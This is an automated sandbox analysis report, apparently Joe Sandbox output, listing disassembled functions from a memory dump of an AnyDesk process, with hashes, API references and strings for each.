                                                                                                                                                                                                                                                  • Opcode ID: a3d6868533390bae32d15b7dfeb583750d589c120dbab47fb9301c5c4c1b7b8a
                                                                                                                                                                                                                                                  • Instruction ID: b36f0c6db7cefe92dd29a7aa01a39ffe8c6696e709b56e55bb8a18e5e8745872
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d6868533390bae32d15b7dfeb583750d589c120dbab47fb9301c5c4c1b7b8a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7512936304B509BD3218E5CF880A5AFBE9FF92760B504A2BE595CB791E371D84087A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4C99D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 69C4CA2D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                  • Opcode ID: 60f45b6ea58c3d3026d90c6a6628b4778510476999a72b6e2036af90fd235882
                                                                                                                                                                                                                                                  • Instruction ID: 1d38beb01d984b808b88d7f801583717dbfdb5f691d994f6b1524e7bc8623698
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60f45b6ea58c3d3026d90c6a6628b4778510476999a72b6e2036af90fd235882
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42517C71B8990196DF01E614EB1139A3BB4BB41F94F10CD68E4A2461F8FF3585B9878B
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C262E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 0-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: aa861dc8e45c3631e9095f10004bf9936ed46ed37cd82a8e95221da4121e518c
                                                                                                                                                                                                                                                  • Instruction ID: 634955b5fa9fcc41e23684155698ae7a9d31674e4b0d51fb4e74d918f8cfb939
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa861dc8e45c3631e9095f10004bf9936ed46ed37cd82a8e95221da4121e518c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB41F7323006544FE3309E5CF940A4AF7E9FBA5661F204A3FE591CB691E7B1D84487B1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2F170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 0-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 7588144b52196081f60e0df2fb1ade7ed4754ea18bec16bb943e69995a9fec32
                                                                                                                                                                                                                                                  • Instruction ID: a3053c75764bfa4b4f42fd949d6bb87ffb8f94496ed226805ef1c54c55573141
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7588144b52196081f60e0df2fb1ade7ed4754ea18bec16bb943e69995a9fec32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1541B135B0021D9FC720CE9DFC90D5AB7AAFF867407904A2EE540CB655EB30E8559BA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5FCD5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GoogleChromeDaysSinceLastRun.GCAPI ref: 69C5FDBB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}, xrefs: 69C5FDDE
                                                                                                                                                                                                                                                  • RelaunchAllowedAfter, xrefs: 69C5FDF8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ChromeDaysGoogleLastSince
                                                                                                                                                                                                                                                  • String ID: RelaunchAllowedAfter$Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
                                                                                                                                                                                                                                                  • API String ID: 2052684696-26780984
                                                                                                                                                                                                                                                  • Opcode ID: 28625e054a84697fdaba56164600b6f5833c4fe368c8bf90d3f08a4a7f7380a2
                                                                                                                                                                                                                                                  • Instruction ID: 7d78f6a7c38c7165048c6b63ccdfa971bf66018b1dfb971c1a3bb066d9e8e1d9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28625e054a84697fdaba56164600b6f5833c4fe368c8bf90d3f08a4a7f7380a2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B4135319002299FEB18CFA4F944BAE73B4FF05758F108419D852AB181FBB1D871EB98
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C64ADC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: dmp$reports
                                                                                                                                                                                                                                                  • API String ID: 0-1316949204
                                                                                                                                                                                                                                                  • Opcode ID: a8578d1942fcd82cd06fc8c355e5f4d850d3e24ff26cc36edcb09856dd7334c6
                                                                                                                                                                                                                                                  • Instruction ID: 810f5851e3e7c176138f28b08eadda517263180513f038a3bb8089077df547de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8578d1942fcd82cd06fc8c355e5f4d850d3e24ff26cc36edcb09856dd7334c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C741B175A00218ABCB14DBB4FCA0EAEB7B9EF44718F509169E415EB280FF309D05CB94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C24D29 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24E2C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 6d9ce6c52082db26fe17a2d195f0c779b9f9d93727f59f34098737cd3b6573e7
                                                                                                                                                                                                                                                  • Instruction ID: 5dbf49ce1c2a5c9db8e94b39c687c5c07d5aa290d85a14fc3015481444cf49d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d9ce6c52082db26fe17a2d195f0c779b9f9d93727f59f34098737cd3b6573e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31B1323047508FE3218F6CF840B5AF7A5FBD1A65F504A2FE651CB281E772D85187A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C24970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24A86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 2abd4e1fd7bb29ce9d5a9716f35ec6964c153dfb7fcc354348c802d34b679953
                                                                                                                                                                                                                                                  • Instruction ID: 7e1b62fdfadef5dee81a2faeed6cd46877c725fda7252499a340004cd2c8bd50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2abd4e1fd7bb29ce9d5a9716f35ec6964c153dfb7fcc354348c802d34b679953
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE318732308214DB8720DF6DF8C095AB3EAFF947653100A2FE656CB610FB31E9118BA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C30A20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C30B4C
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC11: std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC1D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC11: __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC2B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: ,$vector<T> too long
                                                                                                                                                                                                                                                  • API String ID: 1419379543-2403322092
                                                                                                                                                                                                                                                  • Opcode ID: 7a4b03d6f160585c72383a0bf58717c1d4677f015d6e4b67da53ff33850ef58b
                                                                                                                                                                                                                                                  • Instruction ID: 4945ec2cf1e25258d3d8843b7fa22a365ddb8452f2f802a70209ed15eddd6f5b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a4b03d6f160585c72383a0bf58717c1d4677f015d6e4b67da53ff33850ef58b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9831E736E001289BDF00DFA8ECC0AEEF771FF09318F448528D815A7281E771A954C7A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2A660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A70A
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A714
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                  • Opcode ID: d83f2734a4b2cf9f9c6151fecb39ec21425b944208f60e1f310e5a6ec9781b0f
                                                                                                                                                                                                                                                  • Instruction ID: 3570a83b72d73852bc4b4847fc3f9863965da95df1d0349dd09f603042e8f674
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d83f2734a4b2cf9f9c6151fecb39ec21425b944208f60e1f310e5a6ec9781b0f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 411190323187145B57249E6DF88081AF7EAFFE46713200A3FE596C76A0FB61A84487A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5F056 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000104), ref: 69C5F0B2
                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,?,?,?,?,?,?), ref: 69C5F105
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ClassNameWindow
                                                                                                                                                                                                                                                  • String ID: Chrome_WidgetWin_
                                                                                                                                                                                                                                                  • API String ID: 697123166-524248775
                                                                                                                                                                                                                                                  • Opcode ID: 419dabbd16511d31d2870add5e7b910a4a1bb8479b9f1a0d825f10c0c7baa2e4
                                                                                                                                                                                                                                                  • Instruction ID: af9826a779c24aacd176db3206b9187d78cefc9d694bfad7b53796f19f379385
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 419dabbd16511d31d2870add5e7b910a4a1bb8479b9f1a0d825f10c0c7baa2e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE21B4B5940209BFDB14CF64EC84F9AB7B8FF24704F004559A519D7181F771E5A5CB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6134D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77comCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(69C78238,00000000,00000001,69C76804,00000000,00000000,?,00000000,00000000), ref: 69C6136D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3C8D0: SysAllocString.OLEAUT32(?), ref: 69C3C8D9
                                                                                                                                                                                                                                                    • Part of subcall function 69C3C8F0: SysFreeString.OLEAUT32(?), ref: 69C3C8F2
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 69C613BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$AllocBlanketCreateFreeInstanceProxy
                                                                                                                                                                                                                                                  • String ID: ROOT\CIMV2
                                                                                                                                                                                                                                                  • API String ID: 2036101689-2786109267
                                                                                                                                                                                                                                                  • Opcode ID: 79fb3796c0e8e34a012a134e614779d941dabcdf24ce64032f901be00e31c2ee
                                                                                                                                                                                                                                                  • Instruction ID: 1263be1ed96f83df26bbad6cfd9125fc899d39459411e52105c0ac8ad6bd3bfa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79fb3796c0e8e34a012a134e614779d941dabcdf24ce64032f901be00e31c2ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF215B74A40208BFDB10CFA5D8D0EAEBB7CFF49749F1081ADA906AB250E6719E41DB51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3C700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: list<T> too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4027344264
                                                                                                                                                                                                                                                  • Opcode ID: bd8a004608eff1c11782bb6d2246df29cf2b9524051b6122c3095449c6f14184
                                                                                                                                                                                                                                                  • Instruction ID: 1d64ee51f23d33d3f9e3f39fe9862b2361a288447e0783d1854d3fb0a1301855
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8a004608eff1c11782bb6d2246df29cf2b9524051b6122c3095449c6f14184
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46118CBAA01225DFCB14CF68E580A4AB7E8FF49704B5485A9ED08DB301E371ED41CBD0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2A5C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A64E
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2A658
                                                                                                                                                                                                                                                  Strings
